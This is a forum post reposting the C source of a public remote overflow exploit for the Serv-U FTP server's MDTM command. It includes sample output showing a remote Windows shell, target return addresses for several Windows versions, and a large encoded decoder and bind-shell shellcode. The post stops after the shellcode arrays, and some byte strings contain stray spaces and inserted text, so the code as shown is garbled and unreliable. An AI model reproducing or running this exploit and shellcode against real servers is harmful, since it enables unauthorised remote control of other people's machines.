hacked
MASTER
Mesaj Sayısı : 199
Kayıt tarihi : 08/03/08
 | Konu: Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit  Salı Mart 11, 2008 12:04 am | |
| /* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* BUG find by bkbll (bkbll@cnhonker.com), cool! pPPppPPPpp
*
* code by Sam and 2004/01/07
* <chen_xiaobo@venustech.com.cn>
* <Sam@0x557.org>
*
*
* Revise History:
* 2004/01/14 add rebind shellcode :> we can bind shellport at ftpd port.
* 2004/01/09 connect back shellcode added
* 2004/01/08 21:04 upgrade now , we put shellcode in file parameter
* we can attack pacthed serv-U;PPPp by airsupply
* 2004/01/08 change shellcode working on serv-u 4.0/4.1/4.2 now
* thx airsupply
*
* Compile: gcc -o ex_servu ex_servu.c
*
* how works?
* [root@core exp]# ./sv -h 192.168.10.119 -t 3
* Serv-U FTPD 3.x/4.x MDTM Command remote overflow exploit
* bug find by bkbll (bkbll@cnhonker.com) code by Sam (Sam@0x557.org)
*
* # Connecting......
*
Connected.
*
USER ftp .
*
10 bytes send.
*
PASS sst@SERV-u .
*
17 bytes send.
*
login success .
*
remote version: Serv-U v4.x with Windows XP EN SP1
*
trigger vulnerability !
*
1027 bytes overflow strings sent!
*
successed!!
*
*
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* [Sam Chen@SAM C:\]#
*
*
* some thanks/greets to:
* bkbll (he find this bug ), airsupply, kkqq, icbm
* and everyone else who's KNOW SST;P
* http://0x557.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>
#define VER "v5.0"
#define clearbit(buff) bzero(buff, sizeof (buff));
#define padding(buff, a) memset(buff, a, sizeof (buff));
#define MAX_LEN 2048
#define MAX_NUM 4
int x = 0, port = 21, shellport;
char pass[20], user[20];
struct archs {
char *desc;
unsigned int magic;
}architectures[] = {
{
"Serv-U v3.x/4.x/5.x with Windows 2K CN", http://winmm.dll
0x77535985
},
{
"Serv-U v3.x/4.x/5.x with Windows 2K BIG5 version", http://winmm.dll
0x77531790
},
{
"Serv-U v3.x/4.x/5.x with Windows 2K EN",
0x77575985
},
{
"Serv-U v3.x/4.x/5.x with Windows XP CN SP1",
0x76b12f69
},
{
"Serv-U v3.x/4.x/5.x with Windows XP EN SP1",
0x76b42a3a
}
};
char decoder [] =
/* 36 bytes cool decoder by airsupply */
"\x90\x90\x90\x5E\x5F\x5B\xBE\x52\x52\x49\x41\ x46\ xBF\x52\x52\x31"
"\x41\x47\x43\x39\x3B\x75\xFB\x4B\x80\x33\x99\ x39\ x73\xFC\x75\xF7"
"\xFF\xD3\x90\x90";
/* fork + rebind shellcode by airsupply (one way shellcode) */
char shellcode [] =
"\x53\x52\x49\x41"
/*port offset 120 + 4*/
"\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xD9\ x85\ x12\x99\x12\xD9"
"\x91\x18\x75\x19\x98\x99\x99\x12\x65\x12\x76\ x32\ x70\x8B\x9B\x99"
"\x99\xC7\xAA\x50\x28\x90\x66\xEE\x65\x71\xB9\ x98\ x99\x99\xF1\xF5"
"\xF5\x99\x99\xF1\xAA\xAB\xB7\xFD\xF1\xEE\xEA\ xAB\ xC6\xCD\x66\xCC"
"\x9D\x32\xAA\x50\x28\x9C\x66\xEE\x65\x71\x99\ x98\ x99\x99\x12\x6C"
"\x71\x94\x98\x99\x99\xAA\x66\x18\x75\x09\x98\ x99\ x99\xCD\xF1\x98"
"\x98\x99\x99\x66\xCF\xB5\xC9\xC9\xC9\xC9\xD9\ xC9\ xD9\xC9\x66\xCF"
"\xA9\x12\x41\xCE\xCE\xF1\x9B\x99\x8C\x5B\x12\ x55\ xCA\xC8\xF3\x8F"
"\xC8\xCA\x66\xCF\xAD\xC0\xC2\x1C\x59\xEC\x68\ xCE\ xCA\x66\xCF\xA1"
"\xCE\xC8\xCA\x66\xCF\xA5\x12\x49\x10\x1F\xD9\ x98\ x99\x99\xF1\xFC"
"\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\ x98\ x99\x99\x1A\x75"
"\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\ x32\ x7B\x64\x5F\xDD"
"\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\ x10\ xCD\xBD\xD1\x10"
"\xCD\xBD\xD5\x10\xCD\xBD\xC9\x14\xDD\xBD\x89\ x14\ x27\xDD\x98\x99"
"\x99\xCE\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\ x66\ x2F\xA9\x98\x99"
"\x99\xC8\x66\xCF\x91\xAA\x59\xD1\xC9\x66\xCF\ x95\ xCA\xCC\xCF\xCE"
"\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\ x9A\ x4C\x12\xD3\x81"
"\x12\xC3\xB9\x9A\x44\x7A\xA9\xD0\x12\xAD\x12\ x9A\ x6C\xAA\x66\x65"
"\xAA\x59\x35\xA3\x79\xED\x9E\x58\x56\x9E\x9A\ x61\ x72\x6B\xA2\xE5"
"\xBD\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\ x95\ xD2\x12\xC3\x85"
"\x9A\x44\x12\x9D\x12\x9A\x5C\xC6\xC7\xC4\xC2\ x5B\ x9D\x99\xC8\x66"
"\xED\xBD\x91\x34\xC9\x71\x3B\x66\x66\x66\x1A\ x5D\ x9D\xC0\x32\x7B"
"\x74\x5A\xF1\xFC\xE1\xFC\x99\xF1\xFA\xF4\xFD\ xB7\ x10\x3F\xA9\x98"
"\x99\x99\x1A\x75\xCD\x14\xA5\xBD\xAA\x59\xAA\ x50\ x1A\x58\x8C\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA5\ x67\ xDD\xBD\xA4\x10"
"\xDD\xBD\xD1\x10\xDD\xBD\xD5\x10\xDD\xBD\xC9\ x14\ xDD\xBD\x89\x14"
"\x27\xDD\x98\x99\x99\xCE\xC9\xC8\xC8\xF3\x9D\ xC8\ xC8\xC8\x66\x2F"
"\xA9\x98\x99\x99\xC8\x66\xCF\x91\x18\x75\x99\ x9D\ x99\x99\xF1\x9E"
"\x99\x98\x99\xCD\x66\x2F\xD1\x98\x99\x99\x66\ xCF\ x89\xF3\xD9\xF1"
"\x99\x89\x99\x99\xF1\x99\xC9\x99\x99\xF3\x99\ x66\ x2F\xDD\x98\x99"
"\x99\x66\xCF\x8D\x10\x1D\xBD\x21\x99\x99\x99\ x10\ x1D\xBD\x2D\x99"
"\x99\x99\x12\x15\xBD\xF9\x9D\x99\x99\x5E\xD8\ x62\ x09\x09\x09\x09"
"\x5F\xD8\x66\x09\x1A\x70\xCC\xF3\x99\xF1\x99\ x89\ x99\x99\xC8\xC9"
"\x66\x2F\xDD\x98\x99\x99\x66\xCF\x81\xCD\x66\ x2F\ xD1\x98\x99\x99"
"\x66\xCF\x85\x66\x2F\xD1\x98\x99\x99\x66\xCF\ xB9\ xAA\x59\xD1\xC9"
"\x66\xCF\x95\x71\x70\x64\x66\x66\xAB\xED\x08\ x95\ x50\x25\x3F\xF2"
"\x16\x6B\x81\xF8\x51\xCE\xD6\x88\x68\xE2\x05\ x76\ xC1\x96\xD8\x0E"
"\x51\xCE\xD6\x8E\x4F\x15\x07\x6A\xFA\x10\x48\ xD6\ xA4\xF3\x2D\x19"
"\xB4\xAB\xE1\x47\xFD\x89\x3E\x44\x95\x06\x4A\ xD2\ x28\x87\x0E\x98"
"\x06\x06\x06\x06"
"\x53\x52\x31\x41"; | |
|
Anasayfa 
Latest images 
Kayıt Ol 
Giriş yap